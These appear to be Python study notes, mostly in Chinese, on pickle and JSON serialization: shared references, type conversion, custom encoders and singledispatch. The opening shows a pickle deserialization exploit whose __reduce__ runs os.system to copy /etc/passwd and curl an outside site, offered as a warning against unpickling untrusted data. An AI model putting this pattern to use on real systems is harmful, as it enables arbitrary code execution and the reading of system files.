pickling
pickling on UNIX
重要!unpickle 可執行程式,有資安風險。不要 unpickling 不是你自己 pickling 的資料。
import os
import pickle
class Exploit():
def __reduce__(self):
# cat [-u] [-s] [-v [-t] [-e] ] file 本例用來檢視內容,並存入 exploit.txt
# curl [options] [URL...] 本例取得 google 首頁資料,也是存入 exploit.txt
return (os.system, ("cat /etc/passwd > exploit.txt && curl www.google.com >> exploit.txt",))
def serialize_exploit(fname):
with open(fname, 'wb') as f: # wb: write binary
pickle.dump(Exploit(), f)
serialize_exploit('loadme')
pickle.load(open('loadme', 'rb')) # rb: read binary
然後觀察該路徑(/etc/passwd)的相關檔案變化,以及檔案內容(exploit.txt,基本上就是上方程式中註解說明的:/etc/passwd 路徑內容,加上 google 首頁資料)。
上述程式僅支援 UNIX & iOS,不支援 MS-Windows。
Pickling Dictionaries
import pickle
ser = pickle.dumps('Python Pickled Peppers')
ser
# b'\x80\x04\x95\x1a\x00\x00\x00\x00\x00\x00\x00\x8c\x16Python Pickled Peppers\x94.'
deser = pickle.loads(ser)
deser
# 'Python Pickled Peppers'
# 精簡過,非原整原始碼。
# 先指定 d = 原始資料,再令 er = pickle.dumps(d),藉此來展示 is(identiy) 和 ==(equality)
d is deser, d == deser
# (False, True)
# 接著展示不同資料型態的執行結果
# ser = pickle.dumps(3.14) # float
# ser = pickle.dumps([10, 20, ('a', 'b', 30)]) # list
# s = {'a', 'b', 'x', 10} # set
# ser = pickle.dumps({'b': 1, 'a': 2, 'c': {'x': 10, 'y': 20}}) # dictionary
如果要 pickle 的 dictionary,其中部分值是參考另一個 dictionary 呢?
d1 = {'a': 10, 'b': 20}
d2 = {'x': 100, 'y': d1, 'z': d1}
ser = pickle.dumps(d2)
d3 = pickle.loads(ser)
d3['y'] == d2['y']
# True
d3['y'] is d2['y']
# False
接著看如果資料來源是同一個(上述 d1)時,pickling 不會再做一次,而是指向同一個物件(類似 deepcopy 的行為模式)。
不只是 dictionary,lists, sets 和 tuples 也一樣。
d2['y'] is d2['z']
# True
d3['y'] == d3['z']
# True
上述行為,在我們使用 serialization / deserialization 時要特別小心。因為參考同一個 object,serialization / deserialization 後的值,會是原來的參考值。
對照一:沒有用 serialization 時,行為符合我們預期
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
print(d1)
# {'a': 1, 'b': 2}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}}
d1['c'] = 3
print(d1)
# {'a': 1, 'b': 2, 'c': 3}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2, 'c': 3}}
對照二:使用 serialization 時。下次程式執行時,d2 的值,對照到原先的 d1(沒有 ‘c’: 3),而不是新的。
d1 = {'a': 1, 'b': 2}
d2 = {'x': 10, 'y': d1}
d1_ser = pickle.dumps(d1)
d2_ser = pickle.dumps(d2)
# simulate exiting the program, or maybe just restarting the notebook
del d1
del d2
# load the data back up
d1 = pickle.loads(d1_ser)
d2 = pickle.loads(d2_ser)
# and continue processing as before
print(d1)
# {'a': 1, 'b': 2}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}}
d1['c'] = 3
print(d1)
# {'a': 1, 'b': 2, 'c': 3}
print(d2)
# {'x': 10, 'y': {'a': 1, 'b': 2}} # 這裡沒有 'c': 3
最後用老範例(class Person),再驗證一次上述行為。
The pickle module is relatively intelligent and will not re-pickle an object it has already pickled - which means that relative references are preserved.
__
JSON Serialization
基本操作
import json # 注意!本例下方的範例程式,已省略本 import
# serialization
d1 = {'a': 100, 'b': 200}
d1_json = json.dumps(d1)
d1_json, type(d1_json)
# ('{"a": 100, "b": 200}', str)
# deserialization
d2 = json.loads(d1_json)
d2, type(d2)
# ({'a': 100, 'b': 200}, dict)
# equality checking
d1 == d2
# True
提醒:d1 serialization 前後的不同。 {‘a’: 100, ‘b’: 200} vs ‘{“a”: 100, “b”: 200}’
我們可以在 print 中,設定 json.dumps 的參數,讓顯示美觀些。
print(json.dumps(d1, indent=2))
輸出:
{
"a": 100,
"b": 200
}
注意資料型態
Python 的 key,只要是 hashable 即可。但 JSON 的 key,必須是 string。
先來看看當 Python 的 key 是整數時,程式執行過程。
d1 = {1: 100, 2: 200}
d1_json = json.dumps(d1)
d1_json
# '{"1": 100, "2": 200}' # from 1 to "1"
d2 = json.loads(d1_json)
print(d1)
# {1: 100, 2: 200}
print(d2)
# {'1': 100, '2': 200}
注意:上方的程式顯示,Python 將 key 整數,轉換為 string。1 變 “1”、2 變 “2”。
所以 d == loads(dumps(d)) 不成立。
接著看一下,Python 中的一個長字串(內容是 JSON),在做過 serialization / deserialization 後的結果。
d_json = '''
{
"name": "John Cleese",
"age": 82,
"height": 1.96,
"walksFunny": true,
"sketches": [
{
"title": "Dead Parrot",
"costars": ["Michael Palin"]
},
{
"title": "Ministry of Silly Walks",
"costars": ["Michael Palin", "Terry Jones"]
}
],
"boring": null
}
'''
# deserialize this JSON string
d = json.loads(d_json)
print(d)
# {'name': 'John Cleese', 'age': 82, 'height': 1.96,... 過長,恕刪
d
{'name': 'John Cleese',
'age': 82,
'height': 1.96,
'walksFunny': True, # 原本是 true
'sketches': [{'title': 'Dead Parrot', 'costars': ['Michael Palin']},
{'title': 'Ministry of Silly Walks',
'costars': ['Michael Palin', 'Terry Jones']}],
'boring': None} # 原本是 null
注意:serialization / deserialization 後,JSON object不保證 key 的順序相同。
接著檢查 serialization / deserialization 後的資料型態。
print(d['age'], type(d['age']))
print(d['height'], type(d['height']))
print(d['boring'], type(d['boring']))
print(d['sketches'], type(d['sketches']))
print(d['walksFunny'], type(d['walksFunny']))
print(d['sketches'][0], type(d['sketches'][0]))
輸出:
82 <class 'int'>
1.96 <class 'float'>
None <class 'NoneType'>
[{'title': 'Dead Parrot', 'costars': ['Michael Palin']}, {'title': 'Ministry of Silly Walks', 'costars': ['Michael Palin', 'Terry Jones']}] <class 'list'>
True <class 'bool'>
{'title': 'Dead Parrot', 'costars': ['Michael Palin']} <class 'dict'>
As you can see the JSON
array was serialized into a list ,
true was serialized into a bool ,
integer looking values into int ,
float looking values into float and
sub-objects into dict .
As you can see deserializing JSON objects into Python is very straightforward and intuitive.
tuples serializing
d = {'a': (1, 2, 3)}
json.dumps(d)
# '{"a": [1, 2, 3]}'
Python tuples are serialized into JSON lists
bad_json = '''
{"a": (1, 2, 3)}
'''
json.loads(bad_json)
# JSONDecodeError # 這個錯誤提示不是太明顯
Python was able to serialize a tuple by making it into a JSON array
How about other data types: Decimals, Fractions, Complex Numbers, Sets, etc
Decimals
from decimal import Decimal
json.dumps({'a': Decimal('0.5')})
# TypeError
Complex
try:
json.dumps({"a": 1+1j})
except TypeError as ex:
print(ex)
# Object of type 'complex' is not JSON serializable
Set
try:
json.dumps({"a": {1, 2, 3}})
except TypeError as ex:
print(ex)
# Object of type 'set' is not JSON serializable
Now we could get around that problem by looking at the string representation of those objects:
str(Decimal(0.5))
# '0.5'
json.dumps({"a": str(Decimal(0.5))})
# '{"a": "0.5"}'
Own objects
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
p = Person('John', 82)
p
# Person(name=John, age=82)
json.dumps({"john": p})
# TypeError
Solution: write a custom JSON serializer in our class itself, and use that when we serialize the object
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
def toJSON(self):
return dict(name=self.name, age=self.age)
p = Person('John', 82)
p.toJSON()
# {'name': 'John', 'age': 82}
print(json.dumps({"john": p.toJSON()}, indent=2))
輸出:
{
"john": {
"name": "John",
"age": 82
}
}
we can make our life a little easier by using the
varsfunction (or the__dict__attribute) to return a dictionary of our object attributes
vars(p) # vars function
# {'name': 'John', 'age': 82}
p.__dict__
# {'name': 'John', 'age': 82}
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
def toJSON(self):
# return dict(name=self.name, age=self.age)
return vars(self)
json.dumps(dict(john=p.toJSON()))
# '{"john": {"name": "John", "age": 82}}'
dealing with sets, where we do not control the class definition
s = {1, 2, 3}
json.dumps(dict(a=list({1, 2, 3})))
# '{"a": [1, 2, 3]}'
問題:
-
we have to remember to call
.toJSON()for our custom objects -
what about built-in or standard types like sets, or dates? use built-in or write custom functions to convert and call them every time?
Custom JSON Serialization
datetime
from datetime import datetime
import json
current = datetime.utcnow()
# datetime.datetime(2022, 12, 20, 11, 37, 44, 408640)
json.dumps(current)
# TypeError
Python raises a
TypeErrorexception, stating thatdatetimeobjects are not JSON serializable.
from datetime import datetime
import json
def format_iso(dt):
return dt.strftime('%Y-%m-%dT%H:%M:%S')
format_iso(current)
# '2022-12-20T11:37:44'
current.isoformat()
# '2022-12-20T11:37:44.408640'
log_record = {'time': datetime.utcnow().isoformat(), 'message': 'testing'}
json.dumps(log_record)
# {"time": "2022-12-20T11:42:02.394702", "message": "testing"}
this works, but this is far from ideal. Normally, our dictionary will contain the
datetimeobject, not it’s string representation.What we have to do is write custom code to replace non-JSON serializable objects in our dictionary with custom representations.
The simplest way is to specify a function that
dump/dumpswill call when it encounters something it cannot serialize
def format_iso(dt):
return dt.isoformat()
json.dumps(log_record, default=format_iso)
# {"time": "2022-12-20T11:43:12.487649", "message": "testing"}
log_record = {
'time': datetime.utcnow(),
'message': 'Testing...',
'other': {'a', 'b', 'c'} # set尚未處理
}
json.dumps(log_record, default=format_iso)
# AttributeError
if else 判斷式,一個一個加上待處理的資料型態
def custom_json_formatter(arg):
if isinstance(arg, datetime):
return arg.isoformat()
elif isinstance(arg, set):
return list(arg)
接著以萬年範例 class Person 做示範
程式碼略(原理都相同,只是換用 custom object 示範)
class Person 中的 datetime 因為已處理,不用再處理一次。
toJSON method
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
self.create_dt = datetime.utcnow()
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
def toJSON(self):
# return {
# 'name': self.name,
# 'age': self.age,
# 'create_dt': self.create_dt
# }
return vars(self)
用一個較通用的方式,來處理更多不同的資料型態。
def custom_json_formatter(arg):
if isinstance(arg, datetime):
return arg.isoformat()
elif isinstance(arg, set):
return list(arg)
else:
try:
return arg.toJSON()
except AttributeError:
try:
return vars(arg)
except TypeError:
return str(arg)
singledispatch
re-write our custom json formatter using the generic single dispatch decorator.
from functools import singledispatch
@singledispatch
def json_format(arg):
print(arg)
try:
print('\ttrying to use toJSON...')
return arg.toJSON()
except AttributeError:
print('\tfailed - trying to use vars...')
try:
return vars(arg)
except TypeError:
print('\tfailed - using string representation...')
return str(arg)
然後再一一 register 不同的資料型態。
@json_format.register(datetime)
def _(arg):
return arg.isoformat()
@json_format.register(set)
def _(arg):
return list(arg)
最後用之前的 class Person 再示範一次。
class Person:
def __init__(self, name, age):
self.name = name
self.age = age
self.create_dt = datetime.utcnow()
def __repr__(self):
return f'Person(name={self.name}, age={self.age})'
def toJSON(self):
return dict(name=self.name)
# 比較用
# 方法一:
# return {
# 'name': self.name,
# 'age': self.age,
# 'create_dt': self.create_dt
# }
# 方法二:
# return vars(self)
Custom JSON Encoding using JSONEncoder
JSONEncoder
Encode the “standard” types, such as
str,int,float,list,dict, etc.
| Python | JSON |
|---|---|
| dict | object {…} |
| list, tuple | array […] |
| str | string … |
| int, float | number |
| int or float Enums | number |
| bool | true or false |
| None | null |
TypeError exception
non-supported objects
We can actually extend this
JSONEncoderclass and override the default method.
import json
from datetime import datetime
class CustomJSONEncoder(json.JSONEncoder):
def default(self, arg):
if isinstance(arg, datetime):
return arg.isoformat()
else:
super().default(arg)